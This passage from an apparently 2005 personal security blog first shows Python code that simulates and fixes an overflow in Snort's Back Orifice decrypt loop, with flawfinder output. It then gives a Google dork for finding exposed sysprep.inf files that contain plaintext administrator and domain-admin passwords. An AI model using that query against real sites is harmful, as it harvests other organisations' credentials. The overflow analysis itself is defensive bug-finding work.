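def decrypt_bounded(pkt_data: bytes, length: int, keystream):
    """Same loop with the two checks the original lacks: the length must fit in
    buf1 with room for the terminator, and must not exceed the packet."""
    if length >= BUF_SIZE or length > len(pkt_data):
        return None
    bufs = [bytearray(), bytearray()]
    cur = 0
    for i in range(length):
        plaintext = pkt_data[i] ^ next(keystream)
        bufs[cur].append(plaintext)
        if plaintext == 0:
            cur = 1
            bufs[1] = bytearray()  # C resets buf_ptr to the start of buf2
    return bytes(bufs[0]), bytes(bufs[1])


if __name__ == "__main__":
    # Constructed "ping" payloads: 2100 non-NUL bytes marches the pointer straight
    # through buf1, buf2 and the sentinel; 100 bytes stays inside buf1.
    print("overflow with len=2100:", decrypt_unbounded(b"A" * 2100, 2100, constant_keystream(0)))
    print("overflow with len=100: ", decrypt_unbounded(b"A" * 100, 100, constant_keystream(0)))
    print("bounded, len=2100:", decrypt_bounded(b"A" * 2100, 2100, constant_keystream(0)))
    print("bounded, len=7:   ", decrypt_bounded(b"abc\x00xyz", 7, constant_keystream(0)))
```

Note that even len == 1024 is too much for the original loop: the terminator write after the loop lands one byte past buf1, which is why the bounded version rejects anything that is not strictly smaller than the buffer.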

To validate it a bit more I ran the code through flawfinder. This is the output:

Examining spp_bo.c
spp_bo.c:430: [2] (buffer) char:
  Statically-sized arrays can be overflowed. Perform bounds checking,
  use functions that limit length, or ensure that the size is larger than
  the maximum possible length.
spp_bo.c:431: [2] (buffer) char:
  Statically-sized arrays can be overflowed. Perform bounds checking,
  use functions that limit length, or ensure that the size is larger than
  the maximum possible length.

Just my findings.

Friday, October 7, 2005

kPan1c.dc414.org

Just added this blog with masking at http://kPan1c.dc414.org, so you can always just hit that.

Thursday, October 6, 2005

GoogleDork SysPrep Hack

Not sure if you guys know what googledorks are. Basically they are custom Google queries that find some interesting stuff. Johnny Long talks a lot more about them and has a whole database of them on his site http://johnny.ihackstuff.com/.

Now to the fun stuff. Not sure if this has been done or not, but here it goes.

I was talking to someone about sysprep (things it does, options you can set, etc.), which got me thinking of my next idea.

GoogleDork:
+"AdminPassword" | "DomainAdmin" | "DomainAdminPassword"
inurl:sysprep.inf

I know this is a pretty simple googledork (but you would be amazed at the findings): sysprep.inf carries the local AdminPassword, and the DomainAdmin/DomainAdminPassword pair used to join the domain, in plaintext unless EncryptedAdminPassword=Yes was set. If anyone has a better way of doing it or expanding it, I would love to see it.

Tuesday, August 30, 2005

Just Up

Just my site to document my thoughts. Went with LiveJournal because of the Linux client. My icon of the keyboard is just from when I was bored with my camera phone. Nothing else to say.